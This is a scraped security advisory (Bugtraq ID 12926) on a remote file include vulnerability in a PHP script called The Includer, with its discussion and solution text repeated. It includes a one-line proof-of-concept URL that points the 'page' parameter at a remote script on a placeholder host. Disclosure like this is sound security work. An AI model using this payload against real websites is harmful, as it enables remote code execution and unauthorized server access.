The Includer Remote File Include Vulnerability
BID:12926
Info
The Includer Remote File Include Vulnerability
| Bugtraq ID: | 12926 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 29 2005 12:00AM |
| Updated: | Mar 29 2005 12:00AM |
| Credit: | Discovery is credited to hoang yen <[email protected]>. |
| Vulnerable: |
Jimmy Jimmy |
| Not Vulnerable: | |
Discussion
The Includer Remote File Include Vulnerability
The Includer is reported prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
All versions of The Includer are considered to be vulnerable at the moment. This BID will be updated when more information becomes available.
The Includer is reported prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
All versions of The Includer are considered to be vulnerable at the moment. This BID will be updated when more information becomes available.
Exploit / POC
The Includer Remote File Include Vulnerability
An exploit is not required.
Proof of concept example is available:
http://www.example.com/index.php?page=http://www.example.com/exploit
An exploit is not required.
Proof of concept example is available:
http://www.example.com/index.php?page=http://www.example.com/exploit
Solution / Fix
The Includer Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.